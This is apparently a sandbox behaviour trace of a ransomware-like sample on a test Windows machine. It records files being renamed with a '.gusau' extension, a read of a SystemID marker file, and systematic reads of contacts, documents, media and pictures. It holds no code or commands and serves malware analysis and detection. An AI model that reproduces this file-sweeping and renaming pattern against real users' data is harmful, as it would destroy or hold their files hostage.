Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\rbkgNDQN9sYCu5S0K.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\rbkgNDQN9sYCu5S0K.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\ZPlP3lZcQ.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\ZPlP3lZcQ.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\_eu6q3E zyK.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\_eu6q3E zyK.mp4 True 1
Fn
Read C:\SystemID\PersonalID.txt size = 4096, size_out = 42 True 1
Fn
Data
Read C:\SystemID\PersonalID.txt size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact size = 153605, size_out = 1178 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact size = 153605, size_out = 68382 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact size = 153605, size_out = 1171 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact size = 153605, size_out = 1177 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact size = 153605, size_out = 1174 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact size = 153605, size_out = 1172 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots size = 153605, size_out = 79067 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi size = 153605, size_out = 64976 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi size = 153605, size_out = 14789 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg size = 153605, size_out = 81045 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a size = 153605, size_out = 63935 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3 size = 153605, size_out = 28394 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 size = 153605, size_out = 52246 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg size = 153605, size_out = 29997 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 size = 153605, size_out = 44108 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv size = 153605, size_out = 83739 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp size = 153605, size_out = 20816 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe size = 153605, size_out = 153605 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc size = 153605, size_out = 71052 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3 size = 153605, size_out = 93899 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv size = 153605, size_out = 22917 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3 size = 153605, size_out = 12143 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf size = 153605, size_out = 71318 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a size = 153605, size_out = 69041 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf size = 153605, size_out = 40048 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3 size = 153605, size_out = 101332 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf size = 153605, size_out = 26798 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx size = 153605, size_out = 95431 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls size = 153605, size_out = 90350 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc size = 153605, size_out = 91509 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx size = 153605, size_out = 88704 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx size = 153605, size_out = 40458 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv size = 153605, size_out = 53588 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots size = 153605, size_out = 91613 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods size = 153605, size_out = 58219 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots size = 153605, size_out = 22311 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc size = 153605, size_out = 47237 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx size = 153605, size_out = 95757 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx size = 153605, size_out = 62114 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx size = 153605, size_out = 14136 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx size = 153605, size_out = 54781 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx size = 153605, size_out = 15007 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx size = 153605, size_out = 31657 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots size = 153605, size_out = 97311 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx size = 153605, size_out = 30312 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx size = 153605, size_out = 25136 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx size = 153605, size_out = 24873 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx size = 153605, size_out = 27398 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx size = 153605, size_out = 85618 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx size = 153605, size_out = 41682 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx size = 153605, size_out = 20319 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a size = 153605, size_out = 90689 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3 size = 153605, size_out = 14444 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 size = 153605, size_out = 13514 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav size = 153605, size_out = 9056 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a size = 153605, size_out = 82045 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a size = 153605, size_out = 63652 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a size = 153605, size_out = 35188 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav size = 153605, size_out = 49503 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav size = 153605, size_out = 7710 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav size = 153605, size_out = 16405 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a size = 153605, size_out = 73624 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a size = 153605, size_out = 100399 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 size = 153605, size_out = 80228 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 size = 153605, size_out = 61338 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a size = 153605, size_out = 61675 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav size = 153605, size_out = 99046 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a size = 153605, size_out = 73029 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav size = 153605, size_out = 32870 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3 size = 153605, size_out = 36793 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a size = 153605, size_out = 1458 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav size = 153605, size_out = 42788 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3 size = 153605, size_out = 5249 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a size = 153605, size_out = 87332 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav size = 153605, size_out = 71965 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 size = 153605, size_out = 83532 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 size = 153605, size_out = 79489 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 size = 153605, size_out = 73704 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a size = 153605, size_out = 99070 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a size = 153605, size_out = 36985 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a size = 153605, size_out = 59634 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav size = 153605, size_out = 75982 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a size = 153605, size_out = 44975 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav size = 153605, size_out = 65205 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 size = 153605, size_out = 84246 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav size = 153605, size_out = 47073 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a size = 153605, size_out = 82974 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 size = 153605, size_out = 55015 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png size = 153605, size_out = 88490 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png size = 153605, size_out = 52977 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp size = 153605, size_out = 92277 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv size = 38, size_out = 38 True 1
Fn
Data
